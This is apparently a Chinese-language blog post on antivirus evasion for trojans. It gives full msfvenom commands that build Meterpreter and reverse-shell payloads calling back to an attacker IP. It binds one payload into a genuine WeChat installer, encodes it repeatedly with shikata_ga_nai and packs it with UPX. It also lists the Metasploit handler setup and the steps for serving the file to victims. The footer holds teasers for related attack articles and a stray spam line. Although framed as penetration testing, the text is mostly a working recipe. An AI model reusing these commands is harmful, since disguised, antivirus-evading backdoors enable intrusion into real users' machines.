<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    滲透測試-木馬免殺的幾種方式

    一顆小胡椒2022-07-06 22:01:29

    免殺,又叫免殺毒技術,是反病毒,反間諜的對立面,是一種能使病毒或木馬免于被殺毒軟件查殺的軟件。它除了使病毒木馬免于被查殺外,還可以擴增病毒木馬的功能,改變病毒木馬的行為。免殺的基本特征是破壞特征,有可能是行為特征,只要破壞了病毒與木馬所固有的特征,并保證其原有功能沒有改變,一次免殺就能完成了。免殺技術也并不是十惡不赦的,例如,在軟件保護所用的加密產品(比如殼)中,有一些會被殺毒軟件認為是木馬病毒;一些安全領域中的部分安全檢測產品,也會被殺毒軟件誤殺,這時就需要免殺技術來應對這些不穩定因素。

    1、裸奔馬的嘗試

    意為不做任何免殺處理的木馬

    1、使用msf的msfvenom生成木馬文件,生成一個裸奔馬,命名為 weixin.exe吧

    命令:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=8888 -f exe > weixin.exe

    2、部署一下kali上的apache服務,令目標機器能夠訪問下載我們生成的木馬

    2.1、kali中是自帶有apache的,啟動apache服務

    2.2、把生成的weixin.exe文件放在/var/www/html文件夾下

    2.3、在靶機下訪問192.168.111.132/weinxin.exe,已經下載

    2.4、發現被AV查殺

    如果在實戰中,直接投遞裸奔馬比較容易引起對方運維人員的警覺,這種方式也比較冒險,所以在投遞之前,要測試制作的木馬是否會引起相關AV的查殺,比如在在線多引擎病毒識別工具中去測試

    2.5、這里po一個在線殺毒查殺的網站,virustotal是一個提供免費的可疑文件分析服務的網站,它與傳統殺毒軟件的不同之處是它通過多種反病毒引擎掃描文件。使用多種反病毒引擎對您所上傳的文件進行檢測, 以判斷文件是否被病毒, 蠕蟲, 木馬, 以及各類惡意軟件感染。

    2、MSF編碼

    在metasploit框架下免殺的方式之一是msf編碼器,功能是使用msf編碼器對我們制作的木馬進行重新編碼,生成一個二進制文件,這個文件運行后,msf編碼器會將原始程序解碼到內存中并執行。

    1、在kali終端輸入 msfvenom -l encoders,這可以列出所有可用的編碼格式

    2、在msf的/data/templates/下有很多metasploit自帶的用于捆綁木馬的程序模板,這個模塊但是一些反病毒廠商關注的重點,為了更好的實現免殺,我們需要自主選擇一個待捆綁程序。在這里選擇是真正的微信安裝包。(也有對裸奔馬進行shikata_ga_nai編碼饒AV的方法,但是shikata_ga_nai編碼技術多態,每次生成的攻擊載荷文件都不一樣,有時生成的文件會被查殺,有時不會,所以結合以上思路,生成一個捆綁木馬,并進行shikata_ga_nai編碼)

    把微信安裝包放在/root文件夾下

    3、使用msfvenom生成一個Windows環境下的木馬,并捆綁到WeChatSetup.exe上生成WeChatSetup1.exe的合成馬,同時對木馬進行x86/shikata_ga_nai進行多次編碼的方式進行免殺處理。

    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9999 -e x86/shikata_ga_nai -x WeChatSetup.exe -i 12 -f exe -o /root/WeChatSetup1.exe

    參數說明:

    -e /指定編碼方式對攻擊載荷進行重新編碼
    -x /指定木馬捆綁在哪個可執行程序模板上
    -i /指定對目標進行編碼的次數,多次編碼理論上有助于免殺的實現
    -f /指定msf編碼器輸出程序的格式
    -0 /指定處理完畢后的文件輸出路徑

    4、把生成的文件放在kali中的apache服務對應的文件夾下,令攻擊機訪問

    5、攻擊機下載后,在msf上創建監聽

    use exploit/multi/handler
    set payload windows/shell/reverse_tcp ///選擇payload為Windows/shell/reverse_tcp
    show options ///查看一下哪些選項需要配置
    set lhost 192.168.111.132 ///設置一下主機地址
    set lport 9999 ///設置下主機端口,為木馬設定的端口
    run

    6、在目標機器上點擊偽造的安裝包,沒有打開,因為捆綁木馬并多次編碼后,安裝包源文件已經損壞,但是在攻擊機的,目標機器已經上線

    3、UPX加殼

    upx打包器有兩種功能,一種叫做給程序加殼,一種叫壓縮程序,在這里使用打包器的目的是改變后門程序的特征碼。

    壓縮的時候:它首先可執行文件中的可執行數據解壓出來,然后將解壓縮用的代碼附加在前面

    運行的時候:將原本的可執行數據解壓出來,然后再運行解壓縮后的數據

    1、在kali中內置了upx打包器,輸入upx可以看下參數介紹

    2、簡單的命令就是直接upx file,對file文件進行加殼處理,加殼后,因為經過壓縮,文件大小會變小

    3、還是老樣子,把上面經歷過編碼后,又加殼的weixin安裝包放在apache服務的文件夾下,供目標機器讀取下載(如上2.4)

    4、在msf上可以創建正常的連接和監聽,成功傳回

    后言

    免殺技術也被安全技術廠商盯上并開發相對應的檢測技術,所以免殺技術與殺軟技術是互相促進發展的,而且發展速度很快,有些現在可以測試成功的殺軟技術,過段時間就不能用了。免殺技術還需要狠下功夫去研究,接下來也會嘗試python,GO寫的免殺,也會在后續文章中敘述進展!

    免殺滲透測試
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    ,又叫殺毒技術,是反病毒,反間諜的對立面,是一種能使病毒或木馬免于被殺毒軟件查殺的軟件。它除了使病毒木馬免于被查殺外,還可以擴增病毒木馬的功能,改變病毒木馬的行為。的基本特征是破壞特征,有可能是行為特征,只要破壞了病毒與木馬所固有的特征,并保證其原有功能沒有改變,一次就能完成了。
    0x01 前言我們在滲透測試過程中時常會用到一些腳本,而現在大部分的WAF或軟都會根據一些危險組件名、特定字符做為特征來查殺,只要找到其特征,我們可以使用簡單的混淆、拼接等方式來進行
    滲透測試中,最常用的方法是通過dump進程lsass.exe,從中獲得明文口令和hash,今天分享兩個轉儲lsass方式,目前親測可過某60 or 某絨。在原理上都是使用API MiniDumpWriteDump,通過comsvcs.dll的導出函數MiniDump實現dump內存。
    近年來,大量的后滲透利用(Post-Exploitation)工具包、自定義惡意軟件和開源遠程控制木馬(RAT)等具備豐富的檢測規避技術和反溯源能力的工具,活躍于各種實戰對抗演練、勒索攻擊甚至是具有國家背景的APT攻擊之中。入侵者可以運用這類工具進行終端行為以及網絡通信流量的
    對于很多大佬來說肯定是十分熟悉的,弟弟我只能簡單的介紹下其簡介: cs擁有多種協議主機上線方式,集成了提權,憑據導出,端口轉發,socket代理,office攻擊,文件捆綁,釣魚等功能。同時,cs還可以調用Mimikatz等其他知名工具。0x03 實踐說的再多也不如拿真實情況來說話,實踐主要對上述的六種工具做下簡單的使用,并利用線上沙箱進行簡單的查殺檢測。接下來主要以3.12為主。
    0x01前言 由于傳播、利用此文所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,文章作者不為此承擔任何責任。 0x02 內網滲透 利用shiro rce拿到shell上線CS
    由于傳播、利用此文所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,文章作者不為此承擔任何責任。 本文章中的漏洞均為公開的漏洞收集,如果文章中的漏洞出現敏感內容產生了部分影響,請及時聯系作者,望諒解。
    我將使用Kali Linux作為此次學習的攻擊者機器。網絡釣魚攻擊是個人和公司在保護其信息安全方面面臨的最常見的安全挑戰之一。網絡釣魚攻擊的興起對所有組織都構成了重大威脅。這篇主要演示如何利用XSS植入釣魚,獲得管理員內部電腦權限!會彈出需要執行的XSS利用代碼...選擇標準代碼測試
    一顆小胡椒
    暫無描述
      亚洲 欧美 自拍 唯美 另类